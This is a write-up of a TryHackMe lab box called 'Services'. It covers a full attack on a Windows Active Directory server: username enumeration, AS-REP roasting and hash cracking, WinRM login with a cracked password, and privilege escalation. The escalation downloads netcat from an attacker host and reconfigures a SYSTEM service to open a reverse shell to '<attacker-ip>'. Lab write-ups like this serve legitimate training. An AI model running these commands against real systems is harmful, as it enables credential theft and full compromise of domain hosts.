// htb writeup TryHackMe 2026-02-25
Services
HackTheBox Medium TryHackMe
← all boxes
root obtained // PWNED

🧪 Services – TryHackMe

IP Address: 10.201.39.158
Difficulty: Medium
Platform: TryHackMe

🧭 Overview

This box was a Windows Server in an Active Directory environment.
The attack path involved enumerating usernames from a website, validating them with Kerbrute, performing an AS-REP roast to get a password, obtaining WinRM access, and then abusing Server Operators group membership to modify a service for privilege escalation to SYSTEM.

🔍 Enumeration

Nmap / Rustscan

rustscan --ulimit 5000 -a $target -- -sC -sV -Pn -oN nmap_full

Findings:

SMB Enumeration

netexec smb $target -u '' -p ''
netexec smb $target -u 'guest' -p ''

Web Enumeration

Username Generation

python ~/THM/Roasted/AD-Username-Generator/username-generate.py -u users.txt -o generated_users.txt

Kerbrute User Enumeration

kerbrute userenum generated_users.txt --dc $target -d services.local

Valid users found:

AS-REP Roasting

impacket-GetNPUsers services.local/ -dc-ip $target -usersfile kusers.txt -outputfile hashes.txt

Hash cracked with:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Password: Serviceworks1

🎯 Foothold

WinRM Access

netexec winrm $target -u 'j.rock' -p 'Serviceworks1'
evil-winrm -u 'j.rock' -p 'Serviceworks1' -i $target

Retrieved user.txt:

THM{ASr3p_R0****************}

🚀 Privilege Escalation

Enumeration

Service Abuse

Identified AWSLiteAgent service running with SYSTEM privileges.

Uploaded netcat:

wget http://<attacker-ip>/nc.exe -o nc.exe

Changed service binary path:

sc.exe config AWSLiteAgent binPath="C:\Users\j.rock\Desktop\nc.exe -e cmd.exe <attacker-ip> 80"
sc.exe stop AWSLiteAgent
sc.exe start AWSLiteAgent

SYSTEM Shell

nc -lvnp 80

Connected as NT AUTHORITY\SYSTEM.

Retrieved root.txt:

THM{S3rv3r_0p************}

📜 Lessons Learned

🖼 Proof

Proof

← all boxes 0x74617465.sh blue team →